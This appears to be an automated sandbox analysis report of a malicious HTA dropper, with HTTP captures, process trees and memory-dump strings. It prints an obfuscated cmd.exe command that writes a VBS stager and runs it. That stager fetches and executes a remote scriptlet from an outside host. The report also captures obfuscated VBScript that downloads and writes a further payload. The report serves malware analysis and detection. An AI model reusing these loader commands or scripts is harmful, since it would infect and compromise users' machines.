                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 3a 2d 31 2c 75 3a 76 6f 69 64 20 30 7d 7d 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 68 5b 31 5d 3b 72 65 74 75 72 6e 20 68 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 29 7b 66 6f 72 28 3b 6c 2e 68 65 61 64 21 3d 68 5b 31 5d 3b 29 6c 3d 6c 2e 48 3b 66 6f 72 28 3b 6c 2e 6e 65 78 74 21 3d 6c 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6c 3d 6c 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6c 29 7d 3b 6c 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 48 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 2c
                                                                                                                                                                                                                              Data Ascii: :-1,u:void 0}},e=function(h,k){var l=h[1];return ha(function(){if(l){for(;l.head!=h[1];)l=l.H;for(;l.next!=l.head;)return l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.H=h.next=h.head=h},g=0;return c},
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 67 2c 22 76 61 6c 75 65 73 22 29 2e 63 61 6c 6c 28 74 68 69 73 2e 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 3d 75 28 62 2e 70 72 6f 74 6f 74 79 70 65 2c 22 76 61 6c 75 65 73 22 29 3b 62 2e 70 72 6f 74 6f 74 79 70 65 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 75 28 62 2e 70 72 6f 74 6f 74 79 70 65 2c 22 76 61 6c 75 65 73 22 29 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 67 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 63 2e 63 61 6c 6c 28 64 2c 66 2c 66 2c 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 62 7d 2c 22 65 73 36 22 29 3b 77 28 22 4f 62 6a 65 63 74 2e 76 61 6c
                                                                                                                                                                                                                              Data Ascii: g,"values").call(this.g)};b.prototype.keys=u(b.prototype,"values");b.prototype[u(t.Symbol,"iterator")]=u(b.prototype,"values");b.prototype.forEach=function(c,d){var e=this;this.g.forEach(function(f){return c.call(d,f,f,e)})};return b},"es6");w("Object.val
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 62 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 66 2e 76 61 6c 75 65 2c 67 2b 2b 29 29 7d 65 6c 73 65 20 66 6f 72 28 66 3d 62 2e 6c 65 6e 67 74 68 2c 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 62 5b 67 5d 2c 67 29 29 3b 72 65 74 75 72 6e 20 65 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76
                                                                                                                                                                                                                              Data Ascii: b[u(t.Symbol,"iterator")];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.call(d,f.value,g++))}else for(f=b.length,g=0;g<f;g++)e.push(c.call(d,b[g],g));return e}},"es6");w("Object.entries",function(a){return a?a:function(b){v
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC1255INData Raw: 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 7d 3b 65 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 65 7d 3b 77 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 64 61 7d 2c 22 65 73 5f 32 30 32 30 22 29 3b
                                                                                                                                                                                                                              Data Ascii: ;return{done:!0,value:void 0}}};e[u(t.Symbol,"iterator")]=function(){return e};return e};w("Array.prototype.entries",function(a){return a?a:function(){return va(this,function(b,c){return[b,c]})}},"es6");w("globalThis",function(a){return a||da},"es_2020");


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.11.204975852.95.165.104436236C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC469OUTGET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:48:57 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                              x-amz-id-2: dkHHoS6pvZskGWwWpZk0/UQBEuI7UNmEQ3JabX56LAKV9yHKi8yi3nhmUBAFZS1uef4b5Z7LBTA=
                                                                                                                                                                                                                              x-amz-request-id: 88MPYJFZRFHK622J
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:48:58 GMT
                                                                                                                                                                                                                              Last-Modified: Thu, 04 May 2017 08:21:21 GMT
                                                                                                                                                                                                                              ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                              x-amz-meta-s3cmd-attrs: uid:502/gname:staff/uname:user/gid:20/mode:33188/mtime:1493416832/atime:1493796970/md5:d41d8cd98f00b204e9800998ecf8427e/ctime:1493416832
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              2192.168.11.20497573.5.232.2304436236C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:48:56 UTC371OUTGET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-US,en-GB;q=0.7,en;q=0.3
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:48:57 UTC408INHTTP/1.1 200 OK
                                                                                                                                                                                                                              x-amz-id-2: JgYpTaof64StLWz9rW6wMA85SoGWDZYV9Tbiw2GuuCCXFqgqus6XcL2/Uw8FZqbtxO0pR3/QapCwG0qYr3Y96a3NkveesK21BfOueZXIa/o=
                                                                                                                                                                                                                              x-amz-request-id: 88MJT15BMBFC7YW6
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:48:57 GMT
                                                                                                                                                                                                                              Last-Modified: Mon, 10 May 2021 15:23:45 GMT
                                                                                                                                                                                                                              ETag: "2e85899818427b96f57db55dd05d06a7"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 285
                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-12-23 09:48:57 UTC285INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 72 4f 56 64 56 47 72 64 5d 64 81 79 72 88 ab ff ba ab 9d 9d ab ff fa ff cf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff db 00 43 01 79 81 81 ab 96 ab ff ba ba ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c0 00 11 08 00 01 00 01 03 01 22 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: JFIFCrOVdVGrd]dyrCy"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              3192.168.11.204976092.205.57.1024435388C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:48:57 UTC298OUTGET //g1 HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:48:57 UTC247INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:48:57 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                              Location: https://102.57.205.92.host.secureserver.net/g1/
                                                                                                                                                                                                                              Content-Length: 357
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              2024-12-23 09:48:57 UTC357INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 30 32 2e 35 37 2e 32 30 35 2e 39 32 2e 68 6f 73 74 2e 73 65 63 75 72 65 73 65 72 76 65 72 2e 6e 65 74 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p><hr><address>A


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              4192.168.11.204976292.205.57.1024435388C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:48:58 UTC298OUTGET /g1/ HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:48:58 UTC199INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:48:58 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Content-Type: text/plain;;charset=UTF-8
                                                                                                                                                                                                                              2024-12-23 09:48:58 UTC6INData Raw: 36 34 62 38 0d 0a
                                                                                                                                                                                                                              Data Ascii: 64b8
                                                                                                                                                                                                                              2024-12-23 09:48:59 UTC16384INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 72 4d 76 79 75 31 52 41 72 62 61 4a 4b 70 44 5f 31 37 28 79 6f 69 47 6e 7a 4e 75 6f 74 6a 4e 55 5a 46 5f 32 36 2c 20 4e 73 42 48 71 46 78 55 5f 31 29 0d 0a 44 69 6d 20 55 49 72 62 7a 6e 59 52 63 6d 5f 32 37 2c 20 79 64 6f 52 57 52 65 76 7a 34 57 41 56 36 38 5f 32 38 0d 0a 55 49 72 62 7a 6e 59 52 63 6d 5f 32 37 20 3d 20 61 73 63 28 4d 69 64 28 79 6f 69 47 6e 7a 4e 75 6f 74
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function derMvyu1RArbaJKpD_17(yoiGnzNuotjNUZF_26, NsBHqFxU_1)Dim UIrbznYRcm_27, ydoRWRevz4WAV68_28UIrbznYRcm_27 = asc(Mid(yoiGnzNuot
                                                                                                                                                                                                                              2024-12-23 09:48:59 UTC9400INData Raw: 45 35 64 4a 54 58 5f 31 30 29 0d 0a 64 69 6d 20 75 4d 62 44 45 66 30 34 4c 63 42 5f 35 33 3a 20 53 65 74 20 75 4d 62 44 45 66 30 34 4c 63 42 5f 35 33 20 3d 20 63 72 65 61 74 65 6f 62 6a 65 63 74 28 69 53 72 53 56 43 41 57 5f 31 31 29 0d 0a 68 67 4c 4e 39 43 33 5f 35 32 2e 4f 70 65 6e 20 4d 6c 41 4b 35 35 6f 41 34 43 6b 55 71 49 69 53 36 6c 52 6f 5f 37 2c 20 66 71 41 6a 78 62 6a 42 44 34 58 31 5f 35 30 2c 20 46 61 6c 73 65 0d 0a 68 67 4c 4e 39 43 33 5f 35 32 2e 53 65 6e 64 0d 0a 0d 0a 75 4d 62 44 45 66 30 34 4c 63 42 5f 35 33 2e 74 79 70 65 20 3d 20 31 0d 0a 75 4d 62 44 45 66 30 34 4c 63 42 5f 35 33 2e 6f 70 65 6e 0d 0a 75 4d 62 44 45 66 30 34 4c 63 42 5f 35 33 2e 77 72 69 74 65 20 68 67 4c 4e 39 43 33 5f 35 32 2e 72 65 73 70 6f 6e 73 65 42 6f 64 79 0d 0a
                                                                                                                                                                                                                              Data Ascii: E5dJTX_10)dim uMbDEf04LcB_53: Set uMbDEf04LcB_53 = createobject(iSrSVCAW_11)hgLN9C3_52.Open MlAK55oA4CkUqIiS6lRo_7, fqAjxbjBD4X1_50, FalsehgLN9C3_52.SenduMbDEf04LcB_53.type = 1uMbDEf04LcB_53.openuMbDEf04LcB_53.write hgLN9C3_52.responseBody
                                                                                                                                                                                                                              2024-12-23 09:48:59 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-12-23 09:48:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:04:48:31
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
                                                                                                                                                                                                                              Imagebase:0x690000
                                                                                                                                                                                                                              File size:13'312 bytes
                                                                                                                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7a5fc0000
                                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:04:48:55
                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                              Imagebase:0xd10000
                                                                                                                                                                                                                              File size:147'456 bytes
                                                                                                                                                                                                                              MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383159592.000000000C112000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C112000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c112000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: R_
                                                                                                                                                                                                                                • API String ID: 0-847274316
                                                                                                                                                                                                                                • Opcode ID: 742df8e7a4cd762d49dcf4df1b6c615d2888a790dba9c112387ad62a0183f81d
                                                                                                                                                                                                                                • Instruction ID: 13970f01fb6fd90a5b45eabbfc3a6b41547cbb6a88db53d815d1ce5288b1e821
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 742df8e7a4cd762d49dcf4df1b6c615d2888a790dba9c112387ad62a0183f81d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88428D31B04318DFEB14CB59C845BBDB7A1AB45314F99423ADE25AB3A8D77CC884CB91
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
